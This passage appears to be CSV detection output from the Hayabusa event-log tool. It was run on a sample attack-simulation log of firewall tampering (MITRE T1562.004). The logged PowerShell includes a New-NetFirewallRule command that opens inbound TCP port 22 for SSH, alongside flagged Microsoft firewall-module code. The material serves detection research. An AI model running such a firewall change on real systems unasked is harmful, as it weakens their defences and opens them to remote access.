Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:30.001 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:30.043 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:30.044 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:30.046 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:43.608 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:43.609 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.641 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') 
-and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.641 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and 
(@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } 
if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.642 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.652 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.653 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.654 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.654 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.655 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.655 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.656 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.658 
+09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.659 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.660 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 